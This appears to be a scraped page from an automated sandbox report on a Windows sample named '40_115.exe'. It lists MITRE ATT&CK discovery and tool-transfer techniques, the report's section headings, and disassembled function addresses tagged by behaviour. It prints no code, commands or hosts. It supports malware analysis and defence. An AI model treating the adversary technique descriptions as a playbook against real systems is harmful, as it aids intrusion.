Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 40_115.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: 40_115.exePID: 7112, Parent PID: 6024

General

Windows Analysis Report
40_115.exe

Function 00A47920 Relevance: 7.5, APIs: 5, Instructions: 46
processCOMMON

Function 00A43970 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26
timeCOMMON

Function 00A42420 Relevance: 3.0, APIs: 2, Instructions: 18
memoryCOMMON

Function 00A46A80 Relevance: 32.2, APIs: 8, Strings: 10, Instructions: 656
sleepnetworkCOMMON

Function 00A44640 Relevance: 21.7, APIs: 9, Strings: 3, Instructions: 689
COMMON

Function 00A47720 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 156
fileCOMMON

Function 00A45650 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83
networkCOMMON

Function 00A44FF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115
COMMON

Function 00A43870 Relevance: 7.6, APIs: 5, Instructions: 80
fileCOMMON

Function 00A454E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74
networkCOMMON

Function 00A428E0 Relevance: 6.0, APIs: 4, Instructions: 48
timeCOMMON

Function 00A42AC0 Relevance: 4.6, APIs: 3, Instructions: 83
threadCOMMON

Function 00A429C0 Relevance: 4.6, APIs: 3, Instructions: 73
COMMON

Function 00A46B8D Relevance: 3.1, APIs: 2, Instructions: 72
sleepnetworkCOMMON

Function 00A43360 Relevance: 3.0, APIs: 2, Instructions: 45
COMMON

Function 00A42970 Relevance: 3.0, APIs: 2, Instructions: 27
threadCOMMON

Function 00A436C0 Relevance: 3.0, APIs: 2, Instructions: 23
sleepCOMMON

Function 00A46C7F Relevance: 1.6, APIs: 1, Instructions: 51
networkCOMMON

Function 00A46C49 Relevance: 1.6, APIs: 1, Instructions: 51
networkCOMMON

Function 00A455F0 Relevance: 1.5, APIs: 1, Instructions: 33
networkCOMMON

Function 00A42BD0 Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Function 00A45B30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112
networkCOMMON

Function 00A42C10 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 235
timeCOMMON

Function 00A458E0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 172
networkCOMMON

Function 00A457D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84
networkCOMMON

Function 00A473C0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 231
sleepnetworkCOMMON

Function 00A42F30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40
COMMON

Function 00A44142 Relevance: 6.3, APIs: 4, Instructions: 314
COMMON

Function 00A44146 Relevance: 6.3, APIs: 4, Instructions: 313
COMMON

Function 00A424F0 Relevance: 6.0, APIs: 4, Instructions: 28
memoryCOMMONLIBRARYCODE

Function 00A42450 Relevance: 5.0, APIs: 4, Instructions: 25
memoryCOMMON